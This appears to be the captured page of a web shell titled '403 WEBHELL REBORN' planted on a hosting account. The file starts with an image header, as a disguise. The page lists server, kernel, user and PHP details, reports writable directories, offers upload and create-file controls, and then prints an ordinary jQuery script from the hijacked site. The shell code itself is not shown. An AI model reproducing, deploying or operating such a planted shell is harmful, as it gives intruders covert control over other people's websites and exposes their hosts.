ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/data/javascripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html///////data/javascripts/cp-functions.js
var date = new Date();
date.setTime(date.getTime() + (86400*360));

function Nb(str){
    var strlen = str.length;
    if(strlen > 9) var str = str.substring(0, strlen - 9) + '.' + str.substring(strlen - 9, strlen - 6) + '.' + str.substring(strlen - 6, strlen - 3) + '.' + str.substring(strlen - 3, strlen) + '.000';
    else if(strlen > 6) var str = str.substring(0, strlen - 6) + '.' + str.substring(strlen - 6, strlen - 3) + '.' + str.substring(strlen - 3, strlen) + '.000';
    else if(strlen > 3) var str = str.substring(0, strlen - 3) + '.' + str.substring(strlen - 3, strlen) + '.000';
    else if(strlen > 0) var str = str.substring(0, strlen - 0) + '.000';
    return str;
}

function showNumber(){
    $('#IDprice').parent().next().text(Nb($('#IDprice').val()));
    $('#IDfree').parent().next().text(Nb($('#IDfree').val()));
    $('#IDtotal').parent().next().text(Nb($('#IDtotal').val()));
}

$(function() {
    $('.start-toggle').click(function() {
        if ($(this).attr("class") == 'start-toggle toggle-show') {
            $(this).addClass('toggle-hidden').removeClass('toggle-show');
            $('#div-'+this.id).slideUp('slow');
            $.cookie(this.id,'hidden');
        }
        else {
            $(this).addClass('toggle-show').removeClass('toggle-hidden');
            $('#div-'+this.id).slideDown('slow');
            $.cookie(this.id,'show');
        }
    });
            
    $('div .toggle').parent().click(function()  {
        $('ul.sm:visible').slideUp('slow');
        $(this).next().slideDown('slow');
        return false;
    });
});

Anon7 - 2021